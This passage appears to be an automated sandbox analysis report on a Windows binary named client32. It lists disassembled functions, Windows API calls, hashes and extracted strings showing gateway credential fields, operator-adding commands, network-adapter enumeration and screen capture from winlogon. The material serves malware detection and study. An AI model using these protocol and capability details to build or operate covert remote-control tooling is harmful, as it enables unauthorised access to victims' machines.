                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                                • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                                • API String ID: 2942389153-3574733319
                                                                                                • Opcode ID: edf85484b934d46e5c731b0ce8b33a41885cfd13c743d549532024fd6f10ea8b
                                                                                                • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                                • Opcode Fuzzy Hash: edf85484b934d46e5c731b0ce8b33a41885cfd13c743d549532024fd6f10ea8b
                                                                                                • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                                Function 69CED140 Relevance: 54.6, APIs: 15, Strings: 16, Instructions: 362sleepsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CED1BA
                                                                                                • WaitForSingleObject.KERNEL32(00000188,000000FF,00000001,00000000), ref: 69CED1E1
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CED212
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CED223
                                                                                                  • Part of subcall function 69CE8C30: _memset.LIBCMT ref: 69CE8C5B
                                                                                                  • Part of subcall function 69CE8C30: _free.LIBCMT ref: 69CE8CCC
                                                                                                  • Part of subcall function 69CE8B50: _memset.LIBCMT ref: 69CE8B68
                                                                                                  • Part of subcall function 69CE8B50: wsprintfA.USER32 ref: 69CE8B87
                                                                                                • _free.LIBCMT ref: 69CED39A
                                                                                                • _strncpy.LIBCMT ref: 69CED3C9
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CED4D5
                                                                                                • _free.LIBCMT ref: 69CED53F
                                                                                                • _free.LIBCMT ref: 69CED545
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CED573
                                                                                                • _free.LIBCMT ref: 69CED5C8
                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?), ref: 69CED5DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_memset$CriticalSectionSleep_strncpy$EnterLeaveObjectSingleWait__vswprintf_mallocwsprintf
                                                                                                • String ID: 1.1$445817$CLIENT_IP_ADDRESS=%s$CLIENT_IP_ADDRESS=0.0.0.0$CLIENT_NAME=%s$CMD=CTL_CONNECT$CONTROL_NAME=%s$GSK=%s$Gateway_Gsk$Gateway_Password$Gateway_Username$HOSTNAME=%s$MACADDRESS=%s$PROTOCOL_VER=%u.%u$PWD=%s$USER=%s
                                                                                                • API String ID: 2732282590-3123314409
                                                                                                • Opcode ID: a039a8581d5bad0a317f03fa29c8d78e713d4b2adc452f2187c0e2aef4f452df
                                                                                                • Instruction ID: 662bdaf5b65a6cdb39a4c6c344f4524b9beb21a498a9d2e0501a55b3b5353c65
                                                                                                • Opcode Fuzzy Hash: a039a8581d5bad0a317f03fa29c8d78e713d4b2adc452f2187c0e2aef4f452df
                                                                                                • Instruction Fuzzy Hash: DAE182B5C00258AFDB21CF64DC54BEEB7B8AF49304F4481E9E61D67280E7356A45CFA1
                                                                                                Function 69CF5170 Relevance: 52.8, APIs: 17, Strings: 13, Instructions: 281sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF51AD
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF522C
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CF5245
                                                                                                • _free.LIBCMT ref: 69CF5348
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CF53DD
                                                                                                • _memset.LIBCMT ref: 69CF53F4
                                                                                                • _free.LIBCMT ref: 69CF5448
                                                                                                  • Part of subcall function 69CF7B60: _sprintf.LIBCMT ref: 69CF7B77
                                                                                                  • Part of subcall function 69CF77E0: _free.LIBCMT ref: 69CF77EF
                                                                                                • _free.LIBCMT ref: 69CF54AC
                                                                                                • _free.LIBCMT ref: 69CF54BB
                                                                                                • GetTickCount.KERNEL32 ref: 69CF54C9
                                                                                                • GetTickCount.KERNEL32 ref: 69CF54D3
                                                                                                • Sleep.KERNEL32(00000014), ref: 69CF54E9
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898), ref: 69CF5512
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CF554D
                                                                                                • _free.LIBCMT ref: 69CF53A3
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CF556E
                                                                                                • SetLastError.KERNEL32(00000057), ref: 69CF557D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalSection$CountEnterErrorLastLeaveTick_memset$FreeHeapSleep__vswprintf_malloc_sprintf
                                                                                                • String ID: CMD=ADDOPERATOR$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$NEWFN=%s$NEWON=%s$NEWPERMS=%u$NEWPWD=%s$ON=%s$PWD=%s$W$ctl_addoperator - INVALID PARAMETER
                                                                                                • API String ID: 4103114184-1141881251
                                                                                                • Opcode ID: 1ace9d96b48fa27e480f808870674e5b2bd87a8b53fc59505b46f44ee4c83a9d
                                                                                                • Instruction ID: 6e32b270356022aa50ade043c746bb8e99a9ab2c04403cd5933fc00e66572656
                                                                                                • Opcode Fuzzy Hash: 1ace9d96b48fa27e480f808870674e5b2bd87a8b53fc59505b46f44ee4c83a9d
                                                                                                • Instruction Fuzzy Hash: B5B153B5D00259ABDB20DFA4DC94FEEB774AF04308F40C4E9E60AA7541F7746A859F60
                                                                                                Function 69CECDB0 Relevance: 52.7, APIs: 11, Strings: 19, Instructions: 247COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CECDF0
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,00000000,?), ref: 69CECE13
                                                                                                • InterlockedIncrement.KERNEL32(-69D2CB16), ref: 69CECE29
                                                                                                • InterlockedIncrement.KERNEL32(-69D2CB86), ref: 69CECE2F
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898), ref: 69CECE36
                                                                                                • _free.LIBCMT ref: 69CECF2C
                                                                                                • _free.LIBCMT ref: 69CECFD7
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CED029
                                                                                                • _free.LIBCMT ref: 69CED0CA
                                                                                                • _free.LIBCMT ref: 69CED109
                                                                                                • _free.LIBCMT ref: 69CED115
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$CriticalIncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
                                                                                                • String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
                                                                                                • API String ID: 2543302378-3410294771
                                                                                                • Opcode ID: 092a15174d13064d7b50a4d3e31db7d45bb00d6ff5326694843e2c7f267ecc9e
                                                                                                • Instruction ID: 138ae8959a1466f2bd558c1bc2901f31a442768e68d6a5d9267304865bd4a334
                                                                                                • Opcode Fuzzy Hash: 092a15174d13064d7b50a4d3e31db7d45bb00d6ff5326694843e2c7f267ecc9e
                                                                                                • Instruction Fuzzy Hash: 8A9184B6C00259ABDB20DBA4DC40FEE7778AF44208F44D4E9E60A77541F7716A88DFA4
                                                                                                Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 110B3183
                                                                                                • OpenFileMappingA.KERNEL32 ref: 110B31A6
                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                • API String ID: 2071925733-2101319552
                                                                                                • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                                • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                                Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                • wsprintfA.USER32 ref: 1100553D
                                                                                                • DeleteObject.GDI32(?), ref: 11005592
                                                                                                • DeleteObject.GDI32(?), ref: 1100559B
                                                                                                • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                                • DeleteObject.GDI32(?), ref: 110055B8
                                                                                                • DeleteDC.GDI32(?), ref: 110055BE
                                                                                                • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                                • DeleteObject.GDI32(?), ref: 110055D8
                                                                                                • DeleteDC.GDI32(?), ref: 110055DE
                                                                                                • DeleteObject.GDI32(?), ref: 110055EF
                                                                                                • DeleteObject.GDI32(?), ref: 1100561A
                                                                                                • DeleteObject.GDI32(?), ref: 11005638
                                                                                                • DeleteObject.GDI32(?), ref: 11005641
                                                                                                • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                                • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                • API String ID: 2789700732-770455996
                                                                                                • Opcode ID: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
                                                                                                • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                                • Opcode Fuzzy Hash: 131ea691aa0fa706e41bd5a286a094aecf96abdf924dd2abea111bdf7eb7d0a0
                                                                                                • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                                Function 69CEBED0 Relevance: 44.0, APIs: 7, Strings: 18, Instructions: 200COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF75B0: _malloc.LIBCMT ref: 69CF75D8
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                • _free.LIBCMT ref: 69CEBF22
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEBF51
                                                                                                • _free.LIBCMT ref: 69CEBF7C
                                                                                                • _free.LIBCMT ref: 69CEC005
                                                                                                • _free.LIBCMT ref: 69CEC034
                                                                                                • _free.LIBCMT ref: 69CEC063
                                                                                                • _free.LIBCMT ref: 69CEC109
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$_malloc$ErrorFreeHeapLast__vswprintf
                                                                                                • String ID: APPTYPE=%d$BFLG=%d$DA=%d$DATA=$DEPT=%s$ED=%s$ID=%d$MO=%d$OC=%d$SD=%s$TIMING=%d$TM=%s$TZ=%d$UID=%s$UN=%s$WD=%u$WP=%d$YR=%d
                                                                                                • API String ID: 2888336863-1668223812
                                                                                                • Opcode ID: 4c000cef9143de4d8d7169f536770d3f3fca4c0c073d22519dd66edc452ae778
                                                                                                • Instruction ID: 7c75a6b5b0aa230a7372e2bf0b760c5de4afad3bce67305ea089d12f827fda99
                                                                                                • Opcode Fuzzy Hash: 4c000cef9143de4d8d7169f536770d3f3fca4c0c073d22519dd66edc452ae778
                                                                                                • Instruction Fuzzy Hash: 8D5170B95002047BEB51DF21EC84E7F73ACAF4561CF80E428F91A96A05FB35E905A7B1
                                                                                                Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 1110708D
                                                                                                  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,756F4977,00000000), ref: 11138283
                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                                  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                                  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                                  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                                • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11107116
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId,?,1110809F), ref: 111071A0
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses,?,1110809F), ref: 111071F1
                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId,?,1110809F), ref: 1110726A
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                                • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11107446
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                                • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                                • CloseHandle.KERNEL32(?), ref: 1110743F
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                                • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
